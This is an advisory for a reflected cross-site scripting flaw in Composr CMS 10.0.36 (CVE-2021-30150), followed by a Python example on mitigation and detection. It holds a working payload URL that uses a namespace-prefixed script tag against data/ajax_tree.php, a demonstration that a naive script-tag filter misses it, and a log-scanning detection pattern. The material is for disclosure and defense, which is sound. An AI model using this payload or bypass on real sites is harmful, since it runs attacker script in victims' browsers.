Vendor: Composr CMS
By: Orion Hridoy
CVSS: 6.1 (MEDIUM)
CWE: 79 (Cross Site Scripting)
Product Name: Composr CMS
Affected Version From: 10.0.36
Affected Version To: 10.0.36
Patch Exists: YES
Related CVE: CVE-2021-30150
CPE: a:composr:composr_cms:10.0.36
Metasploit:
Other Scripts:
Platforms Tested: Windows, Linux
Year: 2021

Composr CMS 10.0.36 – Cross Site Scripting

Composr CMS version 10.0.36 is vulnerable to cross-site scripting (XSS). The data/ajax_tree.php endpoint reflects attacker-controlled input from a request parameter into the response, so script supplied in that parameter is executed in the context of the victim's browser.

Mitigation:

To mitigate this vulnerability, it is recommended to update the Composr CMS to a patched version or apply the vendor-provided security patch. Additionally, input validation and output encoding should be implemented to prevent XSS attacks.

Exploit-DB raw data:

# Exploit Title: Composr CMS 10.0.36 - Cross Site Scripting
# Date: 04/06/2021
# Exploit Author: Orion Hridoy
# Vendor Homepage: https://compo.sr/
# Software Link: https://compo.sr/download.htm
# Version: 10.0.36
# Tested on: Windows/Linux
# CVE : CVE-2021-30150

Vulnerable Endpoint:
https://site.com/data/ajax_tree.php?hook=choose_gallery&id=&options=a:5:{s:21:"must_accept_something";b:1;s:6:"purity";b:0;s:14:"addable_filter";b:1;s:6:"filter";N;s:9:"member_id";N;}&default=<something:script xmlns:something="http://www.w3.org/1999/xhtml">alert("Hello")</something:script>
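
The Python example below is added here; it is not part of the advisory and not Composr's own code. It takes the default value from the endpoint above as constructed test input and shows why the mitigation section recommends output encoding rather than pattern stripping: a naive filter that removes only the literal script tag leaves the namespace-prefixed tag intact, whereas HTML-escaping the value for its output context neutralizes it. It also includes a small scanner over constructed access-log lines that flags requests carrying a script element (prefixed or not) in that parameter. The log format, client IPs and function names are assumptions.

```python
import html
import re
from urllib.parse import parse_qs, urlparse

# The 'default' value from the advisory's endpoint, used here as constructed test input.
ADVISORY_DEFAULT = (
    '<something:script xmlns:something="http://www.w3.org/1999/xhtml">'
    'alert("Hello")</something:script>'
)

# Matches an element named 'script' with or without an XML namespace prefix
# (covers both <script ...> and <something:script ...>).
SCRIPT_ELEMENT = re.compile(r"<(?:[A-Za-z_][\w.-]*:)?script\b", re.IGNORECASE)


def naive_blocklist_filter(value: str) -> str:
    """Weak 'fix' shown only for contrast: strips literal <script ...> and </script> tags.

    A prefixed tag such as <something:script> is not matched, so the advisory's
    value passes through unchanged.
    """
    return re.sub(r"</?script[^>]*>", "", value, flags=re.IGNORECASE)


def render_default_safely(value: str) -> str:
    """Encode an untrusted value for an HTML text or attribute context before reflecting it.

    html.escape turns < > & " ' into entities, so the browser renders the text
    literally instead of parsing it as markup.
    """
    return html.escape(value, quote=True)


def contains_script_element(fragment: str) -> bool:
    """True if the fragment still contains a (possibly namespace-prefixed) script element."""
    return SCRIPT_ELEMENT.search(fragment) is not None


def default_param_from_log_line(line: str):
    """Extract the percent-decoded 'default' query parameter from an access-log line.

    Returns None when the line has no GET request or no 'default' parameter.
    """
    m = re.search(r'"GET (\S+) HTTP/', line)
    if not m:
        return None
    query = urlparse(m.group(1)).query
    return parse_qs(query, keep_blank_values=True).get("default", [None])[0]


def flag_suspicious_requests(log_lines):
    """Return the client IPs of log lines whose 'default' parameter carries a script element."""
    flagged = []
    for line in log_lines:
        value = default_param_from_log_line(line)
        if value is not None and contains_script_element(value):
            flagged.append(line.split()[0])
    return flagged


# Constructed access-log lines (assumed combined log format, assumed client IPs).
# The second line carries the advisory's payload percent-encoded as a browser would send it.
LOG_LINES = [
    '10.0.0.5 - - [04/Jun/2021:12:00:00 +0000] "GET /data/ajax_tree.php'
    '?hook=choose_gallery&id=&default=Gallery%20one HTTP/1.1" 200 512',
    '10.0.0.9 - - [04/Jun/2021:12:00:01 +0000] "GET /data/ajax_tree.php'
    '?hook=choose_gallery&id=&default='
    '%3Csomething%3Ascript%20xmlns%3Asomething%3D%22http%3A%2F%2Fwww.w3.org%2F1999%2Fxhtml%22%3E'
    'alert%28%22Hello%22%29%3C%2Fsomething%3Ascript%3E HTTP/1.1" 200 640',
]

if __name__ == "__main__":
    print("blocklist leaves payload intact:",
          naive_blocklist_filter(ADVISORY_DEFAULT) == ADVISORY_DEFAULT)
    print("encoded output:", render_default_safely(ADVISORY_DEFAULT))
    print("flagged clients:", flag_suspicious_requests(LOG_LINES))
```

The encoded output is what the endpoint should emit when it reflects the parameter: every angle bracket and quote becomes an entity, so no element is created regardless of the tag name or namespace prefix used. The log scanner is a detection aid for reviewing historical traffic against a patched or unpatched install; it is deliberately broader than a literal match on the advisory string.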